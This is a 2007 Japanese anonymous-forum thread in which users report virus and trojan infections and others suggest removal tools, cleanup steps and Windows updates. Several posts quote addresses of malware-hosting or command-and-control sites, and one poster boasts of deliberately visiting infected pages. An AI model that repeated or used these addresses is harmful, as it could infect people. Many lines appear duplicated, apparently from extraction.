nortonのオンラインチェック⇒上記のウイルス検出
nortonのサイトから無料駆除ツールYaha@mm用をDL後スキャン⇒感染ファイルなしと出る
改めてnortonのオンラインチェック⇒上記のウイルスは検出される
【その他の質問】どうすれば駆除できますか?
640 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:29:30
641 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:40:11
642 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:50:57
643 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:52:41
【使用OS】 windowsXP homeedition
【MicrosoftUpdate】 してる。
【使用セキュリティソフト】 nis2007
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です
【ルータの有無】 なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
VBS Loveletter.A
【どんな症状が出るか】 お気に入りにdesktopというのが増えている
【症状が出る前に何をやったか】 2ch巡回中ブラクラを踏んだ
【症状を解決しようとどのような処置を取ったか】 nisで完全スキャンしてウイルス検出
【その他の質問】 完全削除できたでしょうか?復元するみたいな事も書いてあるので心配です
初心者でごめんなさい知っている方いたらご教授願います。
【MicrosoftUpdate】 してる。
【使用セキュリティソフト】 nis2007
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です
【ルータの有無】 なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
VBS Loveletter.A
【どんな症状が出るか】 お気に入りにdesktopというのが増えている
【症状が出る前に何をやったか】 2ch巡回中ブラクラを踏んだ
【症状を解決しようとどのような処置を取ったか】 nisで完全スキャンしてウイルス検出
【その他の質問】 完全削除できたでしょうか?復元するみたいな事も書いてあるので心配です
初心者でごめんなさい知っている方いたらご教授願います。
644 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:00:13
>>643
VBS.LoveLetter.A
http://www.symantec.com/region/jp/avcenter/venc/data/vbs.loveletter.a.html
VBS.LoveLetter.A (最新情報)
http://www.symantec.com/region/jp/avcenter/venc/data/vbs.loveletter.a2.html
VBS.LoveLetter.A
http://www.symantec.com/region/jp/avcenter/venc/data/vbs.loveletter.a.html
VBS.LoveLetter.A (最新情報)
http://www.symantec.com/region/jp/avcenter/venc/data/vbs.loveletter.a2.html
645 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:05:22
>>643
最新情報の一番下にリンクがあった。
VBS.LoveLetter駆除ツール
http://www.symantec.com/region/jp/avcenter/venc/data/fix.vbs.loveletter.html
最新情報の一番下にリンクがあった。
VBS.LoveLetter駆除ツール
http://www.symantec.com/region/jp/avcenter/venc/data/fix.vbs.loveletter.html
646 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:07:15
647 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:09:55
648 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:10:50
>>644
大丈夫だったんですねー。こんな初心者に親切にしてくれて有り難う。
大丈夫だったんですねー。こんな初心者に親切にしてくれて有り難う。
649 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:13:09
650 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:16:47
651 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:58:37
>>640
名探偵乙
名探偵乙
652 :636:2007/01/31(水) 11:20:05
653 :名無しさん@お腹いっぱい。:2007/01/31(水) 11:26:05
jpgやmp3でもバイナリデータが含まれてるものはウィルスと思わせる動きもするしウィルスも発症するだろ
654 :名無しさん@お腹いっぱい。:2007/01/31(水) 16:23:09
>>653
本気で言ってんの?
本気で言ってんの?
655 :名無しさん@お腹いっぱい。:2007/01/31(水) 16:24:00
XPなんですが、ネットでエロ画像を見たあとにまたネットを開こうとしたら、「ページが表示されません」になってしまいました。
何回やっても表示しないので、ウィルスに感染したのかなと思いますが、バスターが
「このシステム上で次の疑わしい変更を検出しました。項目を選択し、実行したい処理のボタンをクリックして下さい。」
てかいてあるんですが、そのボタンを押すことができず(画面上の選択肢の部分が白くなってて、ダブルクリックしても反応しない。)、同様に「閉じる」というところも白くなってて反応しません。
こういう場合もう手遅れなんでしょうか?だれかいい方法助けてもらえませんか?
何回やっても表示しないので、ウィルスに感染したのかなと思いますが、バスターが
「このシステム上で次の疑わしい変更を検出しました。項目を選択し、実行したい処理のボタンをクリックして下さい。」
てかいてあるんですが、そのボタンを押すことができず(画面上の選択肢の部分が白くなってて、ダブルクリックしても反応しない。)、同様に「閉じる」というところも白くなってて反応しません。
こういう場合もう手遅れなんでしょうか?だれかいい方法助けてもらえませんか?
656 :名無しさん@お腹いっぱい。:2007/01/31(水) 17:24:10
>>653
ちょwwwページ開いただけで感染じゃんw
>>655
2007だよね?
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=JP-2060650
ちょwwwページ開いただけで感染じゃんw
>>655
2007だよね?
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=JP-2060650
657 :名無しさん@お腹いっぱい。:2007/01/31(水) 17:26:23
タイムマシンが完成したw
これから、過去に戻る実験をしてみる
んじゃ!
これから、過去に戻る実験をしてみる
んじゃ!
658 :名無しさん@お腹いっぱい。:2007/01/31(水) 17:49:00
>>653はバイナリデータとか言って通ぶってみたい年頃なんだろ
659 :名無しさん@お腹いっぱい。:2007/01/31(水) 17:55:41
糞ニーのMP3ウォークマン(テキスト表示も可能らしい)ですが
これに感染可能なウィルスなんて存在しましたっけ
これに感染可能なウィルスなんて存在しましたっけ
660 :名無しさん@お腹いっぱい。:2007/01/31(水) 18:04:18
ちょw
exciteのトップ行くと
ノートンがウィルス検出してフリーズするんだけど俺だけ?
3回試してみたんだけど毎回反応した
exciteのトップ行くと
ノートンがウィルス検出してフリーズするんだけど俺だけ?
3回試してみたんだけど毎回反応した
661 :名無しさん@お腹いっぱい。:2007/01/31(水) 18:19:01
662 :名無しさん@お腹いっぱい。:2007/02/01(木) 03:40:52
ふぅ〜。pugyaaaに感染。
大事なファイルは、死守できたから良かったけど、ワンピース295話DLし直しやな。
大事なファイルは、死守できたから良かったけど、ワンピース295話DLし直しやな。
663 :名無しさん@お腹いっぱい。:2007/02/01(木) 10:15:23
664 :名無しさん@お腹いっぱい。:2007/02/01(木) 13:23:19
>>652
WIN恵美ュ礼ー田で病気ばら撒くなよ!
WIN恵美ュ礼ー田で病気ばら撒くなよ!
665 :名無しさん@お腹いっぱい。:2007/02/01(木) 19:08:45
>>646
>>653
Vistaでの事例だからあまり関係ないと思うけど、一応はっとく
これファイルの拡張子はmp3なのかね…
ttp://www.itmedia.co.jp/news/articles/0702/01/news020.html
>>653
Vistaでの事例だからあまり関係ないと思うけど、一応はっとく
これファイルの拡張子はmp3なのかね…
ttp://www.itmedia.co.jp/news/articles/0702/01/news020.html
666 :名無しさん@お腹いっぱい。:2007/02/01(木) 19:14:19
音声コマンド機能が問題なわけね
つまりデータを再生するソフトになんらかの実行権限があるとデータファイルでも安心できないってことかな
つまりデータを再生するソフトになんらかの実行権限があるとデータファイルでも安心できないってことかな
667 :名無しさん@お腹いっぱい。:2007/02/01(木) 19:17:50
ついでにこれもはっとく
Vistaの音声コマンド悪用は可能――Microsoftがコメント
http://www.itmedia.co.jp/news/articles/0702/01/news024.html
Vistaの音声コマンド悪用は可能――Microsoftがコメント
http://www.itmedia.co.jp/news/articles/0702/01/news024.html
668 :名無しさん@お腹いっぱい。:2007/02/01(木) 22:15:32
669 :666 おいらも素人:2007/02/01(木) 22:29:17
>>668
脆弱性ではないでしょ
もともとvistaの音声認識機能は.cmdを実行できる仕組みになっててそれを悪用しようと思えばできるってことでしょ
ちなみにvistaではUACプロンプト機能でデフォでは音声コマンド機能は使えないようになってるらしいからあくまで可能性の話
脆弱性ではないでしょ
もともとvistaの音声認識機能は.cmdを実行できる仕組みになっててそれを悪用しようと思えばできるってことでしょ
ちなみにvistaではUACプロンプト機能でデフォでは音声コマンド機能は使えないようになってるらしいからあくまで可能性の話
670 :名無しさん@お腹いっぱい。:2007/02/01(木) 23:21:49
>>669
悪用される条件が厳しいから、脆弱性というレベルではないってことですか。
では、例えばウイルスファイルの拡張子がjpgであった場合、
画像ビューアでそのファイルを開いた時、コードが実行されてしまったら、
それは、脆弱性によるものと考えておkですか?
悪用される条件が厳しいから、脆弱性というレベルではないってことですか。
では、例えばウイルスファイルの拡張子がjpgであった場合、
画像ビューアでそのファイルを開いた時、コードが実行されてしまったら、
それは、脆弱性によるものと考えておkですか?
671 :名無しさん@お腹いっぱい。:2007/02/01(木) 23:28:56
おkではないです
672 :名無しさん@お腹いっぱい。:2007/02/01(木) 23:48:15
脆弱性 【vulnerability】
コンピュータやネットワークなどの情報システムにおいて、
第三者が保安上の脅威となる行為(システムの乗っ取りや機密情報の漏洩など)に利用できる可能性のあるシステム上の欠陥や仕様上の問題点。
http://e-words.jp/w/E88486E5BCB1E680A7.html
>>670
それはそうでしょ
.jpgは普通画像ファイルを表示する拡張子
それでコードが実行されるのならそれに関連付けられたソフトがどっかおかしい=脆弱性があるってことでしょ
いわゆる0-day attackなんかは脆弱性をついた攻撃だけど
やっぱ.wmfの脆弱性がきっかけとなってマルウェア作者たちがexploitの作成に躍起になってきたのが去年の傾向
だけどソフトの脆弱性はベンダーがアップデートして修正すればオワリだから 個人的にはそんなに心配してないけどね
大事なのはソフトウエアは必ず最新バージョンを使うってこと windowsも然り
ただofficeの脆弱性はパッチでてないのもあるからちょっとヤバイカモ
コンピュータやネットワークなどの情報システムにおいて、
第三者が保安上の脅威となる行為(システムの乗っ取りや機密情報の漏洩など)に利用できる可能性のあるシステム上の欠陥や仕様上の問題点。
http://e-words.jp/w/E88486E5BCB1E680A7.html
>>670
それはそうでしょ
.jpgは普通画像ファイルを表示する拡張子
それでコードが実行されるのならそれに関連付けられたソフトがどっかおかしい=脆弱性があるってことでしょ
いわゆる0-day attackなんかは脆弱性をついた攻撃だけど
やっぱ.wmfの脆弱性がきっかけとなってマルウェア作者たちがexploitの作成に躍起になってきたのが去年の傾向
だけどソフトの脆弱性はベンダーがアップデートして修正すればオワリだから 個人的にはそんなに心配してないけどね
大事なのはソフトウエアは必ず最新バージョンを使うってこと windowsも然り
ただofficeの脆弱性はパッチでてないのもあるからちょっとヤバイカモ
まあフリーソフトだと最新版のほうがスパイウエアはいってたりするけどねw
674 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:07:26
【使用OS】
ME
【MicrosoftUpdate】
全然してない
【使用セキュリティソフト】
多分なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
WORM_NETSKY.DAM
【どんな症状が出るか】
CPYファイルがやたら増え続ける
【症状が出る前に何をやったか】
昨日カボス導入
【症状を解決しようとどのような処置を取ったか】
とりあえずトレンドマイクロして発見
今これしてる→BitDefender Online Scanner
【その他の質問】
単純に削除しようとしたら使用中で削除できません><
ME
【MicrosoftUpdate】
全然してない
【使用セキュリティソフト】
多分なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
WORM_NETSKY.DAM
【どんな症状が出るか】
CPYファイルがやたら増え続ける
【症状が出る前に何をやったか】
昨日カボス導入
【症状を解決しようとどのような処置を取ったか】
とりあえずトレンドマイクロして発見
今これしてる→BitDefender Online Scanner
【その他の質問】
単純に削除しようとしたら使用中で削除できません><
675 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:14:56
676 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:33:22
677 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:35:08
>>676
MEだしなP2P専用機とかなんだよね?
MEだしなP2P専用機とかなんだよね?
678 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:38:38
>>677
そうだと良かったんだけど、どう見てもメインです( ^ω^)
そうだと良かったんだけど、どう見てもメインです( ^ω^)
679 : ◆N9P3SuvBPo :2007/02/02(金) 00:44:33
>678
メイン機でP2Pはお奨めじゃないね。
そもそも、感染後にセキュリティソフトなんて無意味に等しいから。
さらに、WindowsUpdateもやっていない。(去年の7月を最後にサポートは終わりましたが
これまでの分も全然していなかったことですか?)
何かあっても当然のことです。
>セーフモードで該当ファイルの削除は不可
WORM_NETSKY.DAM が削除できないということですよね。
ウイルスの発見場所はどこからですか?
正確にお願いします。
メイン機でP2Pはお奨めじゃないね。
そもそも、感染後にセキュリティソフトなんて無意味に等しいから。
さらに、WindowsUpdateもやっていない。(去年の7月を最後にサポートは終わりましたが
これまでの分も全然していなかったことですか?)
何かあっても当然のことです。
>セーフモードで該当ファイルの削除は不可
WORM_NETSKY.DAM が削除できないということですよね。
ウイルスの発見場所はどこからですか?
正確にお願いします。
680 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:00:40
WindowsUpdateは最後にしたのが,いつか分からないぐらいしてませんでした
ウイルスの発見場所は
C:\_RESTORE\TEMP
C:\_RESTORE\ARCHIVE
です
ウイルスの発見場所は
C:\_RESTORE\TEMP
C:\_RESTORE\ARCHIVE
です
681 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:04:26
>>680
クリーンインストール推奨
クリーンインストール推奨
682 : ◆N9P3SuvBPo :2007/02/02(金) 01:07:42
>C:\_RESTORE\
MEのシステムの復元フォルダ…じゃないよね…。
とりあえず、システムの復元を一旦無効にしてみて。
MEのシステムの復元フォルダ…じゃないよね…。
とりあえず、システムの復元を一旦無効にしてみて。
683 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:12:33
>>672
レスありがと。自分でも調べてみようと思います。
レスありがと。自分でも調べてみようと思います。
684 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:14:56
質問です。
ttp://85.255.117.131/users/maxx/web/xxx.jpg
↑これ踏んじゃったんだけどスキャン削除だけで大丈夫?
avastはDNSChanger-Kだって言うんだけどぐぐってもよく分からない。
削除前後で何も変わらないから不安。。
ttp://85.255.117.131/users/maxx/web/xxx.jpg
↑これ踏んじゃったんだけどスキャン削除だけで大丈夫?
avastはDNSChanger-Kだって言うんだけどぐぐってもよく分からない。
削除前後で何も変わらないから不安。。
685 : ◆N9P3SuvBPo :2007/02/02(金) 01:24:48
>684
踏んでみた。
ウイルスが検出されたが、削除して終わり。
MU最新の状態なら大丈夫だと思う。
心配なら、カスペのオンラインスキャン
踏んでみた。
ウイルスが検出されたが、削除して終わり。
MU最新の状態なら大丈夫だと思う。
心配なら、カスペのオンラインスキャン
686 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:28:42
>>682
紛れもなくMEのシステムの復元フォルダです( ^ω^)
システムの復元を無効にしたら,
C:\_RESTORE\ARCHIVE
C:\_RESTORE\TEMP
両方のフォルダの中身が全て消えました( ^ω^)
とりあえずもう一度ウイルスチェックしてみます
紛れもなくMEのシステムの復元フォルダです( ^ω^)
システムの復元を無効にしたら,
C:\_RESTORE\ARCHIVE
C:\_RESTORE\TEMP
両方のフォルダの中身が全て消えました( ^ω^)
とりあえずもう一度ウイルスチェックしてみます
687 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:30:13
>>685
ありがとう。行ってきますー。
ありがとう。行ってきますー。
688 : ◆N9P3SuvBPo :2007/02/02(金) 01:30:50
>686
ウイルスのチェックが終わったら、復元を有効にすることを忘れるな。
ウイルスのチェックが終わったら、復元を有効にすることを忘れるな。
689 :名無しさん@お腹いっぱい。:2007/02/02(金) 02:11:22
先日PCがウィルスにかかりました。
「pugyaaa」という症状なのですが対処方法だれか知りませんか?
「pugyaaa」という症状なのですが対処方法だれか知りませんか?
690 :名無しさん@お腹いっぱい。:2007/02/02(金) 02:18:53
>>689
P2Pヤメレバカ
P2Pヤメレバカ
691 :名無しさん@お腹いっぱい。:2007/02/02(金) 02:36:11
692 :名無しさん@お腹いっぱい。:2007/02/02(金) 03:39:31
693 :名無しさん@お腹いっぱい。:2007/02/02(金) 03:54:11
先ほどトレンドマイクロのオンラインウイルススキャンしてみたのですが、
JAVA_BYTEVER.AYというウイルスが3つ検出されました。
オンラインウイルススキャンだとどのフォルダにこのウイルスが入ってるか
わからないのですが調べる方法ありますか?
ちなみにファイルとフォルダの検索で探してみましたが見当たらないとの
ことでした。
宜しくお願いします。
JAVA_BYTEVER.AYというウイルスが3つ検出されました。
オンラインウイルススキャンだとどのフォルダにこのウイルスが入ってるか
わからないのですが調べる方法ありますか?
ちなみにファイルとフォルダの検索で探してみましたが見当たらないとの
ことでした。
宜しくお願いします。
694 :名無しさん@お腹いっぱい。:2007/02/02(金) 05:05:20
質問です。ノートンでは検出しなかったのですが
ウィルスチェイサーで検出、治療できたウィルスがあります。
「win32.HLLW.Autoruner」という検出名でした。
ぐぐっても日本語サイトは出てきません。
どんなウィルスだったんでしょうか?
ウィルスチェイサーで検出、治療できたウィルスがあります。
「win32.HLLW.Autoruner」という検出名でした。
ぐぐっても日本語サイトは出てきません。
どんなウィルスだったんでしょうか?
695 :名無しさん@お腹いっぱい。:2007/02/02(金) 09:52:38
自分が悪かったのはわかっています。
自業自得なのですがこのままでは他の人に迷惑をかけてしまうので助けてください。
【使用OS】
XP
【MicrosoftUpdate】
いつ行ってもwebページが真っ白で開かないのでやってませんでした。
感染してからなんとか更新したら前回の更新は2004年7月でした…。
【使用セキュリティソフト】
使っていませんでした。
【ルータの有無】
有(有線)
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Trojan.Win32.Agent.zq
Trojan-Proxy.Win32.small.ck
【どんな症状が出るか】
・200種類くらいのアドレスを使い大量メール送信が行われていると
プロバイダがら連絡がありました。
・IEのトップページが海外のセキュリティーソフトを買え!っていうようなのに変わり
なんか見知らぬソフトが常駐してアラートが出るようになった。
【症状が出る前に何をやったか】
PSP関係のHPを見にいったらWARNNINGのメッセージとソフトの説明が出てその後すぐ
自業自得なのですがこのままでは他の人に迷惑をかけてしまうので助けてください。
【使用OS】
XP
【MicrosoftUpdate】
いつ行ってもwebページが真っ白で開かないのでやってませんでした。
感染してからなんとか更新したら前回の更新は2004年7月でした…。
【使用セキュリティソフト】
使っていませんでした。
【ルータの有無】
有(有線)
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Trojan.Win32.Agent.zq
Trojan-Proxy.Win32.small.ck
【どんな症状が出るか】
・200種類くらいのアドレスを使い大量メール送信が行われていると
プロバイダがら連絡がありました。
・IEのトップページが海外のセキュリティーソフトを買え!っていうようなのに変わり
なんか見知らぬソフトが常駐してアラートが出るようになった。
【症状が出る前に何をやったか】
PSP関係のHPを見にいったらWARNNINGのメッセージとソフトの説明が出てその後すぐ
696 :名無しさん@お腹いっぱい。:2007/02/02(金) 09:54:19
【症状を解決しようとどのような処置を取ったか】
ノートン先生の試用版を入れる
→ウイルスバスターでオンラインスキャン。Troj_agent.sadともう1つ何か出たので該当ファイルを削除
→IEも元に戻りスキャンしても何もでなくなった。駆除出来たと思い安心。
→そしてやっぱり重いのでノートン先生削除(ごめんなさい…)
→プロバイダからメール大量送信の連絡
→マカフィーの試用版入れる。セーフモードでスキャンしても出ない。
→ウイルスバスターオンラインスキャン。やっぱり出ない。
→カスペのオンラインスキャンで上記のもの発見。
→駆除方法検索しても海外サイトでうちのソフト買え!とかばっかりだったので該当ファイルを削除
でもTrojan.Win32.Agent.zqの入ってるwindows\temp\1608796.exeが見つからない。
→カスペでオンラインスキャン。Trojan.Win32.Agent.zqだけになった。
【その他の質問】
Trojan.Win32.Agent.zqの駆除方法がわかりません。
windows\temp\1608796.exe この該当ファイルが見つからないので削除も出来ません。
違う場所に入ったり名前が変わったりするものなのでしょうか?
ノートン先生の試用版を入れる
→ウイルスバスターでオンラインスキャン。Troj_agent.sadともう1つ何か出たので該当ファイルを削除
→IEも元に戻りスキャンしても何もでなくなった。駆除出来たと思い安心。
→そしてやっぱり重いのでノートン先生削除(ごめんなさい…)
→プロバイダからメール大量送信の連絡
→マカフィーの試用版入れる。セーフモードでスキャンしても出ない。
→ウイルスバスターオンラインスキャン。やっぱり出ない。
→カスペのオンラインスキャンで上記のもの発見。
→駆除方法検索しても海外サイトでうちのソフト買え!とかばっかりだったので該当ファイルを削除
でもTrojan.Win32.Agent.zqの入ってるwindows\temp\1608796.exeが見つからない。
→カスペでオンラインスキャン。Trojan.Win32.Agent.zqだけになった。
【その他の質問】
Trojan.Win32.Agent.zqの駆除方法がわかりません。
windows\temp\1608796.exe この該当ファイルが見つからないので削除も出来ません。
違う場所に入ったり名前が変わったりするものなのでしょうか?
697 :名無しさん@お腹いっぱい。:2007/02/02(金) 11:57:47
>>696
>Trojan.Win32.Agent.zqの駆除方法がわかりません。
>windows\temp\1608796.exe この該当ファイルが見つからないので削除も出来ません。
>違う場所に入ったり名前が変わったりするものなのでしょうか?
隠し属性かシステム属性が付いてるんじゃない?
windows\tempで、コマンドプロンプトから attrib -h -s * をやってみるとか。
>Trojan.Win32.Agent.zqの駆除方法がわかりません。
>windows\temp\1608796.exe この該当ファイルが見つからないので削除も出来ません。
>違う場所に入ったり名前が変わったりするものなのでしょうか?
隠し属性かシステム属性が付いてるんじゃない?
windows\tempで、コマンドプロンプトから attrib -h -s * をやってみるとか。
698 :名無しさん@お腹いっぱい。:2007/02/02(金) 13:45:32
失礼します。さきほど
http://www.interq.or.jp/tokyo/yang/lo.htm
というサイトを踏んでしまい、何か変だ?と思い
ノートンでスキャンをしたところ、たくさん検出されました。
数はたくさんありますが、
WScript.KakWorm というものが2つ
Bloodhound.Exploit.6 というものが19こあります。
全てファイルの検疫が正常に完了しました
となっていますが、大丈夫でしょうか?
http://www.interq.or.jp/tokyo/yang/lo.htm
というサイトを踏んでしまい、何か変だ?と思い
ノートンでスキャンをしたところ、たくさん検出されました。
数はたくさんありますが、
WScript.KakWorm というものが2つ
Bloodhound.Exploit.6 というものが19こあります。
全てファイルの検疫が正常に完了しました
となっていますが、大丈夫でしょうか?
699 :名無しさん@お腹いっぱい。:2007/02/02(金) 17:57:33
>>698
心配要らないと思います。
心配要らないと思います。
700 :名無しさん@お腹いっぱい。:2007/02/02(金) 18:32:38
PC初心者のものです
とある海外のサイトを踏んでしまい、複数のウイルスが検出され、
NODで隔離したんですが、それだけでも大丈夫なのでしょうか?
ちなみに隔離済み-切断と表示されています。
とある海外のサイトを踏んでしまい、複数のウイルスが検出され、
NODで隔離したんですが、それだけでも大丈夫なのでしょうか?
ちなみに隔離済み-切断と表示されています。
701 :名無しさん@お腹いっぱい。:2007/02/02(金) 18:38:56
702 :名無しさん@お腹いっぱい。:2007/02/02(金) 20:03:05
703 :名無しさん@お腹いっぱい。:2007/02/02(金) 20:04:14
Windowsの脆弱性を突くウイルス被害が増加、確実にアップデートを
http://internet.watch.impress.co.jp/cda/news/2007/02/02/14668.html
情報処理推進機構セキュリティセンター(IPA/ISEC)は2日、1月のウイルス・不正アクセスの届出状況をまとめた。
1月の傾向としては、Windows Updateを実施していないユーザーがウイルスに多く感染しているとして、
Windowsやセキュリティ対策ソフトのアップデートを行なうよう呼びかけている
IPA/ISECでは今月の呼びかけを「アップデートは忘れずに!!」として、Windowsやウイルス対策ソフトのアップデート状況が最新であるかを確認することを促している。
2006年12月から2007年1月にかけて、個人からの相談や届出が多く寄せられている「W32/Fujacks」は、Windowsのセキュリティホールを悪用して感染するウイルスで、
Windows Updateを実施していないユーザーが被害に遭っているという
W32/FujacksはWebページを表示しただけでも感染する危険性があるため、対策としてWindowsや各種ソフトウェアのアップデートを確実に実施するよう呼びかけている。
http://internet.watch.impress.co.jp/cda/news/2007/02/02/14668.html
情報処理推進機構セキュリティセンター(IPA/ISEC)は2日、1月のウイルス・不正アクセスの届出状況をまとめた。
1月の傾向としては、Windows Updateを実施していないユーザーがウイルスに多く感染しているとして、
Windowsやセキュリティ対策ソフトのアップデートを行なうよう呼びかけている
IPA/ISECでは今月の呼びかけを「アップデートは忘れずに!!」として、Windowsやウイルス対策ソフトのアップデート状況が最新であるかを確認することを促している。
2006年12月から2007年1月にかけて、個人からの相談や届出が多く寄せられている「W32/Fujacks」は、Windowsのセキュリティホールを悪用して感染するウイルスで、
Windows Updateを実施していないユーザーが被害に遭っているという
W32/FujacksはWebページを表示しただけでも感染する危険性があるため、対策としてWindowsや各種ソフトウェアのアップデートを確実に実施するよう呼びかけている。
704 : ◆N9P3SuvBPo :2007/02/02(金) 20:12:24
>695-696
該当ファイルを消しただけで解決するとは思えないな。
と言うよりもプロバイダから連絡受けて、なおかつ自分が悪くて
他の人に迷惑をかけてしまうって言ってるのなら
こんなとこに質問する前にリカバリしようって気にはならなかったん?
>【MicrosoftUpdate】
>いつ行ってもwebページが真っ白で開かないのでやってませんでした。
原因はなんだろうね?
ActiveXかJavaScript切ってたからとか。
>【使用セキュリティソフト】
>使っていませんでした。
今回の件は、MU最新+ブラウザの設定次第で予防可能。
>・200種類くらいのアドレスを使い大量メール送信が行われていると
> プロバイダから連絡がありました。
プロバイダのほうも連絡するなら、ついでに何か対処法でも教えてやれよw
って思うのは俺だけじゃないのか。
とりあえずさ、一刻も早く何とかしたいのなら、リカバリして。
>703
たしか「Fujacks系」って主に中華系のサイトに行くと感染できるんだよね。
サポートが終わった9x系のOSでIE直踏みすると確実に感染だよね?
該当ファイルを消しただけで解決するとは思えないな。
と言うよりもプロバイダから連絡受けて、なおかつ自分が悪くて
他の人に迷惑をかけてしまうって言ってるのなら
こんなとこに質問する前にリカバリしようって気にはならなかったん?
>【MicrosoftUpdate】
>いつ行ってもwebページが真っ白で開かないのでやってませんでした。
原因はなんだろうね?
ActiveXかJavaScript切ってたからとか。
>【使用セキュリティソフト】
>使っていませんでした。
今回の件は、MU最新+ブラウザの設定次第で予防可能。
>・200種類くらいのアドレスを使い大量メール送信が行われていると
> プロバイダから連絡がありました。
プロバイダのほうも連絡するなら、ついでに何か対処法でも教えてやれよw
って思うのは俺だけじゃないのか。
とりあえずさ、一刻も早く何とかしたいのなら、リカバリして。
>703
たしか「Fujacks系」って主に中華系のサイトに行くと感染できるんだよね。
サポートが終わった9x系のOSでIE直踏みすると確実に感染だよね?
>>704
そうみたいっすね
fujacksはIEの脆弱性を利用してたのか…
道理で中国で爆発的に広がったわけだ
アイコンを「パンダ」にするウイルスが蔓延、Webアクセスで感染
http://itpro.nikkeibp.co.jp/article/NEWS/20070202/260515/
そうみたいっすね
fujacksはIEの脆弱性を利用してたのか…
道理で中国で爆発的に広がったわけだ
アイコンを「パンダ」にするウイルスが蔓延、Webアクセスで感染
http://itpro.nikkeibp.co.jp/article/NEWS/20070202/260515/
706 :名無しさん@お腹いっぱい。:2007/02/02(金) 20:51:10
707 :名無しさん@お腹いっぱい。:2007/02/02(金) 20:57:17
つか最低うpだてくらいはしろよ
このスレの感染者ほとんどやってないだろ
このスレの感染者ほとんどやってないだろ
708 :名無しさん@お腹いっぱい。:2007/02/02(金) 21:05:55
693とかそうかも・・・MSJVMの穴でしょこれ
709 : ◆N9P3SuvBPo :2007/02/02(金) 21:26:09
>705
実は一ヶ月くらい前、いや2〜3週間前に、そのFujacksが埋め込まれているサイトに行ったのよ。
たしかTrendmicroにあった。
「このサイトはウイルスコードを含んでいるため、絶対アクセスするな!」って。
間違ってアクセスできないように、アドレスは全角文字ねんてな。
98SE(WU最新)・IE6SP1・マカフィー常駐(自動更新)の環境で行ってみたよw
中華系のサイトが表示された。マカフィーは反応無かった。
もう一度アクセスしてみた。
何とも無いんだけどw もし感染なんかしたら大好きなオマンコ画像が拝めな(ry
>707
いえ、ちゃんとやってる人もいるようですが、操作ミスやP2P関連で
感染しちゃうってパターンもあります。
実は一ヶ月くらい前、いや2〜3週間前に、そのFujacksが埋め込まれているサイトに行ったのよ。
たしかTrendmicroにあった。
「このサイトはウイルスコードを含んでいるため、絶対アクセスするな!」って。
間違ってアクセスできないように、アドレスは全角文字ねんてな。
98SE(WU最新)・IE6SP1・マカフィー常駐(自動更新)の環境で行ってみたよw
中華系のサイトが表示された。マカフィーは反応無かった。
もう一度アクセスしてみた。
何とも無いんだけどw もし感染なんかしたら大好きなオマンコ画像が拝めな(ry
>707
いえ、ちゃんとやってる人もいるようですが、操作ミスやP2P関連で
感染しちゃうってパターンもあります。
710 :名無しさん@お腹いっぱい。:2007/02/02(金) 21:31:27
ウイルスに感染するような初心者がP2Pやるなって話だがな。
711 :名無しさん@お腹いっぱい。:2007/02/02(金) 21:41:27
ウィルスに感染するような初心者がP2PしてるおかげでDLし放題
>>709
WHBOYってやつですかw
fujacksはexploitの利用はないと思っていたんですが
サイトによっては既知のexploitを利用してfujacksを自動実行させる仕掛けを仕込んでるところがあるかもしれないですね
WHBOYってやつですかw
fujacksはexploitの利用はないと思っていたんですが
サイトによっては既知のexploitを利用してfujacksを自動実行させる仕掛けを仕込んでるところがあるかもしれないですね
713 : ◆N9P3SuvBPo :2007/02/02(金) 21:54:03
>712
そうそうWHBOYだ。
さらにソース見たらIframeタグが使われていた。
もう1つあったけど、重くて繋がらなかったから断念したよ。
そうそうWHBOYだ。
さらにソース見たらIframeタグが使われていた。
もう1つあったけど、重くて繋がらなかったから断念したよ。
714 :名無しさん@お腹いっぱい。:2007/02/02(金) 21:59:45
715 :名無しさん@お腹いっぱい。:2007/02/03(土) 11:44:19
セキュリhチソフトを入れてなかった俺の自業自得なのですが・・・対処法を教えて欲しいです。
【使用OS】 WINDOWS XP
【MicrosoftUpdate】 してませんでした
【使用セキュリティソフト】 ウイルスバスター(感染後)
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
TROJ AGENT.DEL TROJ AGENT.SAD TROJ ZLOB.DSI etc...
【どんな症状が出るか】
起動・動作がもの凄く重くなり、IEに繋ぐと海外のセキュリティサイトに飛ばされて「今すぐインストール」みたいな表示が出ます。
System32フォルダ内のPROTECTOR.EXEが5秒ごとに動作しています(ファイアーウォールにかかりログが残ってます)
それから15分ごとに
ttp://mswindowsupdate.info/good_ip.php
